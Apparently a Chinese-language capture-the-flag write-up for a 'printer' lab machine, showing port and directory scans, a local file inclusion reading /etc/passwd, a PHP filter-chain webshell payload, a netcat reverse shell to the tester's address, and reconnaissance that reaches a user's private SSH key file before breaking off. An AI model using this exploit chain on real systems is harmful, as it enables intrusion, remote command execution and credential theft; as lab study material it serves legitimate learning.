![\"image-20240427161735717\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404281751129.png\")
<\/div>\n
![\"image-20240428165920566\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404281751130.png\")
<\/div><\/p>\n\u4fe1\u606f\u626b\u63cf<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/printer2]\n\u2514\u2500$ rustscan -a 192.168.0.181 -- -A\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nReal hackers hack time \u231b\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.0.181:22\nOpen 192.168.0.181:80\nOpen 192.168.0.181:631\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)\n| ssh-hostkey: \n| 3072 db:f9:46:e5:20:81:6c:ee:c7:25:08:ab:22:51:36:6c (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDQGwzNlaaGEELNmSaaA5KPNGnxOCBP8oa7QB1kl8hkIrIGanBlB8e+lifNATIlUM57ReHEaoIiJMZLQlMTATjzQ3g76UxpkRMSfFMfjOwBr3T9xAuggn11GkgapKzgQXop1xpVnpddudlA2DGT56xhfAefOoh9LV\/Sx5gw\/9sH+YpjYZNn4WYrfHuIcvObaa1jE7js8ySeIRQffj5n6wX\/eq7WbohB6yFcLb1PBvnfNhvqgyvwcCWiwZoNhRMa+0ANpdpZyOyKQcbR51w36rmgJI0Y9zLIyjHvtxiNuncns0KFvlnS3JXywv277OvJuqhH4ORvXM9kgSKebGV+\/5R0D\/kFmUA0Q4o1EEkpwzXiiUTLs6j4ZwNojp3iUVWT6Wb7BmnxjeQzG05LXkoavc63aNf+lcSh9mQsepQNo5aHlHzMefPx\/j2zbjQN8CHCxOPWLTcpFlyQSZjjnpGxwYiYyqUZ0sF8l9GWtj6eVgeScGvGy6e0YTPG9\/d6o2oWdMM=\n| 256 33:c0:95:64:29:47:23:dd:86:4e:e6:b8:07:33:67:ad (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFwHzjIh47PVCBqaldJCFibsrsU4ERboGRj1+5RNyV5zFxNTNpdu8f\/rNL9s0p7zkqERtD2xb4zBIl6Vj9Fpdxw=\n| 256 be:aa:6d:42:43:dd:7d:d4:0e:0d:74:78:c1:89:a1:36 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOUM7hNt+CcfC4AKOuJumfdt3GCMSintNt9k0S2tA1XS\n80\/tcp open http syn-ack Apache httpd 2.4.56 ((Debian))\n|_http-server-header: Apache\/2.4.56 (Debian)\n| http-methods: \n|_ Supported Methods: HEAD GET POST OPTIONS\n|_http-title: Free Website Templates\n631\/tcp open ipp syn-ack CUPS 2.3\n|_http-server-header: CUPS\/2.3 IPP\/2.1\n| http-robots.txt: 1 disallowed entry \n|_\/\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\n|_http-title: Home - CUPS 2.3.3op2\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/printer2]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.181\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/192.168.0.181\/\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: bak,jpg,txt,html,php,zip\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php (Status: 403) [Size: 278]\n\/images (Status: 301) [Size: 315] [--> http:\/\/192.168.0.181\/images\/]\n\/.html (Status: 403) [Size: 278]\n\/.html (Status: 403) [Size: 278]\n\/.php (Status: 403) [Size: 278]\n\/server-status (Status: 403) [Size: 278]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n
![\"image-20240428170133972\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u968f\u624b\u641c\u4e00\u4e0b\u6f0f\u6d1e\uff0c\u4f46\u662f\u6ca1\u627e\u5230\uff0c\u770b\u4e00\u4e0b\u5305\uff1a<\/p>\n
<\/div><\/p>\n\u5b58\u5728dns\u89e3\u6790\uff1a<\/p>\n
192.168.0.181 printer4life.printer.hmv<\/code><\/pre>\n\u5c1d\u8bd5\u63a2\u6d4b\u4e00\u4e0b\u5b50\u76ee\u5f55\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/printer2]\n\u2514\u2500$ gobuster dir -u http:\/\/printer4life.printer.hmv\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/printer4life.printer.hmv\/\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: bak,jpg,txt,html,php,zip\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php (Status: 403) [Size: 289]\n\/.html (Status: 403) [Size: 289]\n\/index.php (Status: 200) [Size: 365]\n\/logo (Status: 200) [Size: 77750]\n\/logo.jpg (Status: 200) [Size: 77750]\n\/hp.php (Status: 200) [Size: 27]\n\/hp.jpg (Status: 200) [Size: 33673]\n\/hp (Status: 200) [Size: 33673]\n\/canon (Status: 200) [Size: 101939]\n\/canon.jpg (Status: 200) [Size: 101939]\n\/canon.php (Status: 200) [Size: 30]\n\/epson.jpg (Status: 200) [Size: 64020]\n\/epson (Status: 200) [Size: 64020]\n\/epson.php (Status: 200) [Size: 30]\n\/.php (Status: 403) [Size: 289]\n\/.html (Status: 403) [Size: 289]\n\/server-status (Status: 403) [Size: 289]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\nLFI<\/h3>\n
\u518d\u770b\u770b\u6709\u5565\uff1a<\/p>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/printer2]\n\u2514\u2500# curl http:\/\/printer4life.printer.hmv\/<!DOCTYPE html>\n<html>\n<head>\n <title>Printers<\/title>\n<\/head>\n<body>\n <h1>Select a printer<\/h1>\n <p>I love printers so much ! I print every minute<\/p>\n <ul>\n <li><a href="index.php?page=hp">HP<\/a><\/li>\n <li><a href="index.php?page=canon">Canon<\/a><\/li>\n <li><a href="index.php?page=epson">Epson<\/a><\/li>\n <\/ul>\n<\/body>\n<\/html><\/code><\/pre>\n\u53d1\u73b0\u7591\u4f3c\u5b58\u5728LFI<\/code>\u6f0f\u6d1e\uff1a<\/p>\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/printer2]\n\u2514\u2500# curl http:\/\/printer4life.printer.hmv\/index.php?page=..\/..\/..\/..\/..\/etc\/passwd\n<!DOCTYPE html>\n<html>\n<head>\n <title>Printers<\/title>\n<\/head>\n<body>\n <h1>Select a printer<\/h1>\n <p>I love printers so much ! I print every minute<\/p>\n <ul>\n <li><a href="index.php?page=hp">HP<\/a><\/li>\n <li><a href="index.php?page=canon">Canon<\/a><\/li>\n <li><a href="index.php?page=epson">Epson<\/a><\/li>\n <\/ul>\n<\/body>\n<\/html>\n\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:101:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:102:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:103:109::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:104:110:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\navahi-autoipd:x:105:113:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nmabelle:x:1000:1000:,,,:\/home\/mabelle:\/bin\/bash\navahi:x:107:115:Avahi mDNS daemon,,,:\/run\/avahi-daemon:\/usr\/sbin\/nologin\nsaned:x:108:117::\/var\/lib\/saned:\/usr\/sbin\/nologin\ncolord:x:109:118:colord colour management daemon,,,:\/var\/lib\/colord:\/usr\/sbin\/nologin\nsalt:x:110:119::\/var\/lib\/salt:\/bin\/sh\n_rpc:x:111:65534::\/run\/rpcbind:\/usr\/sbin\/nologin\nkierra:x:1001:1002:,,,:\/home\/kierra:\/bin\/bash<\/code><\/pre>\n\u4e0d\u9519\uff01\uff01\uff01\uff01\uff01<\/p>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/printer2]\n\u2514\u2500# curl http:\/\/printer4life.printer.hmv\/index.php?page=php:\/\/filter\/convert.base64-encode\/resource=..\/..\/..\/..\/..\/etc\/passwd\n<!DOCTYPE html>\n<html>\n<head>\n <title>Printers<\/title>\n<\/head>\n<body>\n <h1>Select a printer<\/h1>\n <p>I love printers so much ! I print every minute<\/p>\n <ul>\n <li><a href="index.php?page=hp">HP<\/a><\/li>\n <li><a href="index.php?page=canon">Canon<\/a><\/li>\n <li><a href="index.php?page=epson">Epson<\/a><\/li>\n <\/ul>\n<\/body>\n<\/html>\n\ncm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L3Vzci9zYmluL25vbG9naW4KaXJjOng6Mzk6Mzk6aXJjZDovcnVuL2lyY2Q6L3Vzci9zYmluL25vbG9naW4KZ25hdHM6eDo0MTo0MTpHbmF0cyBCdWctUmVwb3J0aW5nIFN5c3RlbSAoYWRtaW4pOi92YXIvbGliL2duYXRzOi91c3Ivc2Jpbi9ub2xvZ2luCm5vYm9keTp4OjY1NTM0OjY1NTM0Om5vYm9keTovbm9uZXhpc3RlbnQ6L3Vzci9zYmluL25vbG9naW4KX2FwdDp4OjEwMDo2NTUzNDo6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtbmV0d29yazp4OjEwMToxMDI6c3lzdGVtZCBOZXR3b3JrIE1hbmFnZW1lbnQsLCw6L3J1bi9zeXN0ZW1kOi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtcmVzb2x2ZTp4OjEwMjoxMDM6c3lzdGVtZCBSZXNvbHZlciwsLDovcnVuL3N5c3RlbWQ6L3Vzci9zYmluL25vbG9naW4KbWVzc2FnZWJ1czp4OjEwMzoxMDk6Oi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgpzeXN0ZW1kLXRpbWVzeW5jOng6MTA0OjExMDpzeXN0ZW1kIFRpbWUgU3luY2hyb25pemF0aW9uLCwsOi9ydW4vc3lzdGVtZDovdXNyL3NiaW4vbm9sb2dpbgphdmFoaS1hdXRvaXBkOng6MTA1OjExMzpBdmFoaSBhdXRvaXAgZGFlbW9uLCwsOi92YXIvbGliL2F2YWhpLWF1dG9pcGQ6L3Vzci9zYmluL25vbG9naW4Kc3NoZDp4OjEwNjo2NTUzNDo6L3J1bi9zc2hkOi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtY29yZWR1bXA6eDo5OTk6OTk5OnN5c3RlbWQgQ29yZSBEdW1wZXI6LzovdXNyL3NiaW4vbm9sb2dpbgptYWJlbGxlOng6MTAwMDoxMDAwOiwsLDovaG9tZS9tYWJlbGxlOi9iaW4vYmFzaAphdmFoaTp4OjEwNzoxMTU6QXZhaGkgbUROUyBkYWVtb24sLCw6L3J1bi9hdmFoaS1kYWVtb246L3Vzci9zYmluL25vbG9naW4Kc2FuZWQ6eDoxMDg6MTE3OjovdmFyL2xpYi9zYW5lZDovdXNyL3NiaW4vbm9sb2dpbgpjb2xvcmQ6eDoxMDk6MTE4OmNvbG9yZCBjb2xvdXIgbWFuYWdlbWVudCBkYWVtb24sLCw6L3Zhci9saWIvY29sb3JkOi91c3Ivc2Jpbi9ub2xvZ2luCnNhbHQ6eDoxMTA6MTE5OjovdmFyL2xpYi9zYWx0Oi9iaW4vc2gKX3JwYzp4OjExMTo2NTUzNDo6L3J1bi9ycGNiaW5kOi91c3Ivc2Jpbi9ub2xvZ2luCmtpZXJyYTp4OjEwMDE6MTAwMjosLCw6L2hvbWUva2llcnJhOi9iaW4vYmFzaAo=<\/code><\/pre>\n\u53d1\u73b0\u53ef\u4ee5\u4f7f\u7528\u4f2a\u534f\u8bae\u8fdb\u884c\u8bfb\u5199\uff0c\u5c1d\u8bd5\u6784\u9020php\u94fe\u8fdb\u884c\u547d\u4ee4\u6267\u884c\uff01<\/p>\n
python3 php_filter_chain_generator.py --chain '<?=`$_GET[0]` ?>'\n[+] The following gadget chain will generate the following code : <?=`$_GET[0]` ?> (base64 value: PD89YCRfR0VUWzBdYCA\/Pg)\nphp:\/\/filter\/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode\/resource=php:\/\/temp<\/code><\/pre>\n\u5c1d\u8bd5\u53cd\u5f39shell\uff01\uff01\uff01\uff01<\/p>\n
http:\/\/printer4life.printer.hmv\/index.php?page=php:\/\/filter\/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode\/resource=php:\/\/temp&0=whoami<\/code><\/pre>\n<\/div><\/p>\n\u6210\u529f\u6267\u884c\u547d\u4ee4\uff0c\u53cd\u5f39\u4e00\u4e0bshell\uff01\uff01\uff01\uff01<\/p>\n
http:\/\/printer4life.printer.hmv\/index.php?page=payload&0=nc+-e+\/bin\/bash+192.168.0.143+1234<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) www-data@printer.hmv:\/var\/www\/printer4life$ sudo -l\n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n #1) Respect the privacy of others.\n #2) Think before you type.\n #3) With great power comes great responsibility.\n\n[sudo] password for www-data: \nsudo: a password is required\n(remote) www-data@printer.hmv:\/var\/www\/printer4life$ cat \/etc\/passwd | grep "bash"\nroot:x:0:0:root:\/root:\/bin\/bash\nmabelle:x:1000:1000:,,,:\/home\/mabelle:\/bin\/bash\nkierra:x:1001:1002:,,,:\/home\/kierra:\/bin\/bash\n(remote) www-data@printer.hmv:\/var\/www\/printer4life$ cd \/home\n(remote) www-data@printer.hmv:\/home$ ls\nkierra mabelle\n(remote) www-data@printer.hmv:\/home$ cd kierra\/\n(remote) www-data@printer.hmv:\/home\/kierra$ ls -la\ntotal 24\ndrwxr-xr-x 2 kierra kierra 4096 Apr 22 2023 .\ndrwxr-xr-x 4 root root 4096 Apr 22 2023 ..\nlrwxrwxrwx 1 root root 9 Apr 22 2023 .bash_history -> \/dev\/null\n-rw-r--r-- 1 kierra kierra 220 Apr 22 2023 .bash_logout\n-rw-r--r-- 1 kierra kierra 3526 Apr 22 2023 .bashrc\n-rw-r--r-- 1 kierra kierra 807 Apr 22 2023 .profile\n-rwx------ 1 kierra kierra 33 Apr 22 2023 user.txt\n(remote) www-data@printer.hmv:\/home\/kierra$ cat user.txt \ncat: user.txt: Permission denied\n(remote) www-data@printer.hmv:\/home\/kierra$ cd ..\/mabelle\/\n(remote) www-data@printer.hmv:\/home\/mabelle$ ls -la\ntotal 32\ndrwxr-xr-x 4 mabelle mabelle 4096 May 20 2023 .\ndrwxr-xr-x 4 root root 4096 Apr 22 2023 ..\nlrwxrwxrwx 1 root root 9 Apr 14 2023 .bash_history -> \/dev\/null\n-rw-r--r-- 1 mabelle mabelle 220 Apr 14 2023 .bash_logout\n-rw-r--r-- 1 mabelle mabelle 3526 Apr 14 2023 .bashrc\ndrwxr-xr-x 3 mabelle mabelle 4096 May 20 2023 .local\n-rw-r--r-- 1 mabelle mabelle 807 Apr 14 2023 .profile\ndrwx------ 2 mabelle mabelle 4096 Apr 22 2023 .ssh\n-rw-r--r-- 1 mabelle mabelle 2602 Apr 22 2023 mabelle_private_ssh_key\n(remote) www-data@printer.hmv:\/home\/mabelle$ cat mabelle_private_ssh_key \n-----BEGIN OPENSSH PRIVATE 